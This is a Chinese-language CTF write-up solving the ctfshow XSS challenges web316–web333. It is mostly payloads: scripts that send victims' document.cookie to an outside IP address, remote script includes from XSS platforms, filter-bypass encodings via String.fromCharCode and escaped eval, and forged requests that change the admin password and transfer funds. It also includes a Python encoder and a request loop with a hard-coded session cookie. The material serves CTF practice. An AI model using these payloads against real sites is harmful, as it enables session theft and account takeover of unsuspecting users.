2022年1月10日03:32:25评论42 views字数 14502阅读48分20秒阅读模式

前言

记录web的题目wp，慢慢变强，铸剑。

XSS

web316

什么是xss？

1、跨站脚本攻击（Cross Site Scripting），为不和层叠样式表（Cascading Style Sheets，CSS）的缩写混淆，故将跨站脚本攻击缩写为 XSS。恶意攻击者往 WEB 页面里插入恶意 HTML 代码，当用户浏览该页之时，嵌入其中 Web 里面的 HTML 代码会被执行，从而达到恶意攻击用户的特殊目的。

2、通过 document.cookie 盗取 cookie中的信息
使用 js或 css破坏页面正常的结构与样式
流量劫持（通过访问某段具有 window.location.href 定位到其他页面）
dos攻击：利用合理的客户端请求来占用过多的服务器资源，从而使合法用户无法得到服务器响应。并且通过携带过程的 cookie信息可以使服务端返回400开头的状态码，从而拒绝合理的请求服务。
利用 iframe、frame、XMLHttpRequest或上述 Flash等方式，以（被攻击）用户的身份执行一些管理动作，或执行一些一般的如发微博、加好友、发私信等操作，并且攻击者还可以利用 iframe，frame进一步的进行 CSRF 攻击。
控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力。

XSS的分类

1、反射型：
一般来说这种类型的XSS，需要攻击者提前构造一个恶意链接，来诱使客户点击，比如这样的一段链接：www.abc.com/?params=`x`

2、存储型：
这种类型的XSS，危害比前一种大得多。比如一个攻击者在论坛的楼层中包含了一段JavaScript代码，并且服务器没有正确进行过滤输出，那就会造成浏览这个页面的用户执行这段JavaScript代码。

3、DOM型：
这种类型则是利用非法输入来闭合对应的html标签。
比如，有这样的一个a标签：
乍看问题不大，可是当$var的内容变为 ’ οnclick=’alert(/xss/) //，这段代码就会被执行。

先找一个xs平台来进行中介，xss平台导航注册一个号，然后点击创建项目，名字随意，默认模块，随便一个代码

在输入框提交就可以拿到flag了

xss平台刷新一下

但是如果你有服务器就会简单很多，直接在服务器上python -m http.server 39543监听这个端口

1	<script>location.href="http://ip:39543/"+document.cookie</script>

web317

过滤了script，用img代码

1	<img src='' onerror=location.href='http://118.195.161.220:39543/'+document.cookie>

web318

过滤img，用xss平台的实体十六进制编码

1	<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xss.pt/eKcZ"></sCrIpT>>

继续用服务器抓iframe

1	<iframe onload=document.location='http://118.195.161.220:39543/?cookie='+document.cookie>

web319

iframe继续撸，不过换种写法

1	<iframe onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>

web320

过滤了空格可以换%09制表符或者/来代替

可以利用String.fromCharCode来进行转换

1	<body/onload=document.write(String.fromCharCode(60,115,67,82,105,80,116,32,115,82,67,61,47,47,120,115,46,115,98,47,49,66,113,117,62,60,47,115,67,114,73,112,84,62));>

iframe没过滤继续用，用/来代替空格

1	<iframe onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>

web321

过滤了逗号，我换了个10进制实体

1	<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xs.sb/1Bqu"></sCrIpT>>

或者换一种，用String.fromCharCode拼接<script>alert(1)</script>

document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(99));document.write(String.fromCharCode(114));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(62));document.write(String.fromCharCode(97));document.write(String.fromCharCode(108));document.write(String.fromCharCode(101));document.write(String.fromCharCode(114));document.write(String.fromCharCode(116));document.write(String.fromCharCode(40));document.write(String.fromCharCode(49));document.write(String.fromCharCode(41));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(99));document.write(String.fromCharCode(114));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(62));

写一个脚本跑

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/7
# blog: gylq.gitee.io
a= "<sCRiPt sRC=//xs.sb/1Bqu></sCrIpT>"

res_ord=''
res = ''

for i in a:
    tmp = ord(i)
    res_ord = str(tmp)
    payload="document.write(String.fromCharCode({}));".format(res_ord)
    print(payload,end="")

<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>

服务器payload，继续iframe

1	<iframe/onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>

web322

还是转实体

1	<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xs.sb/1Bqu"></sCrIpT>>

或者上面那个方法

<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>

服务器形式，和上题一样

web323

过滤iframe

<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>

过滤了iframe那就换svg

1	<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

web324

<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>

服务器

1	<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

web325

服务器

1	<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

好像上个用不了了，那就把转换成native编码或者js转义的base 16进制编码，我写了两种

js转义的base 16进制编码 注意：简单方法，先转换为URL编码然后文本编辑器替换%为\x

eval("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x36\x30\x2C\x31\x31\x35\x2C\x36\x37\x2C\x38\x32\x2C\x31\x30\x35\x2C\x38\x30\x2C\x31\x31\x36\x2C\x33\x32\x2C\x31\x31\x35\x2C\x38\x32\x2C\x36\x37\x2C\x36\x31\x2C\x34\x37\x2C\x34\x37\x2C\x31\x32\x30\x2C\x31\x31\x35\x2C\x34\x36\x2C\x31\x31\x35\x2C\x39\x38\x2C\x34\x37\x2C\x34\x39\x2C\x36\x36\x2C\x31\x31\x33\x2C\x31\x31\x37\x2C\x36\x32\x2C\x36\x30\x2C\x34\x37\x2C\x31\x31\x35\x2C\x36\x37\x2C\x31\x31\x34\x2C\x37\x33\x2C\x31\x31\x32\x2C\x38\x34\x2C\x36\x32\x29\x29\x3B")

还有native编码

eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")

paylaod

<body/onload=eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")>

web326

服务器

1	<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

xss平台

<body/onload=eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")>

web327

收件人为admin，这次换个写法

1	<body onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

web328

继续服务器监听

1	<script>window.open('http://118.195.161.220:39543/'+document.cookie)</script>

浏览器console一键设置cookie

var cookiestr="你的打到的cookie内容";var arr = cookiestr.split(";");
for(var i in arr){
 document.cookie=arr[i];
}

web329

这次cookie不持久，所以就直接获取页面信息，通过document来获取

1	<script>window.open('http://118.195.161.220:39543/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

web330

多了个修改密码功能

1	<script>window.open('http://127.0.0.1/api/change.php?p=123456')</script>

admin 123456登陆

web331

换成了post请求，用ajax发送请求

1	<script>$.ajax({url:"api/change.php",method:"POST",data:{'p':'1234567'}})</script>

web332

1	<script>$.ajax({url: "http://127.0.0.1/api/amount.php",method: "POST",data: {'u'='gylq','a':10000},cache: false,success: function(res){}});</script>

向admin转-10000

web333

burp抓包跑一波，为了练习一下python，写个脚本跑，两个，非预期和预期解

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/7
# blog: gylq.gitee.io
import requests
url = "http://d69814f3-233e-41dc-b8e0-5cb7ffbc711d.challenge.ctf.show:8080/api/amount.php"
headers ={'Cookie':'PHPSESSID=q3crvj696jaorhq25sktu88l3j'} #登陆后的sessionid
for i in range(0,10000):
    tmp=i*4
    data = {
        'u': 'admin123',
        'a': str(tmp)
    }
    res=requests.post(url,data=data,headers=headers)

1	<script>$.ajax({url:'api/amount.php',type:'POST',data:{'u':'gylq','a':'10000'}})</script>

FROM:gylq.gitee Author:孤桜懶契

左青龙
微信扫一扫

右白虎
微信扫一扫

【ctfshow】web篇-XSS wp

前言

XSS

web316

web317

web318

web319

web320

web321

web322

web323

web324

web325

web326

web327

web328

web329

web330

web331

web332

web333

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论

在线咨询

微信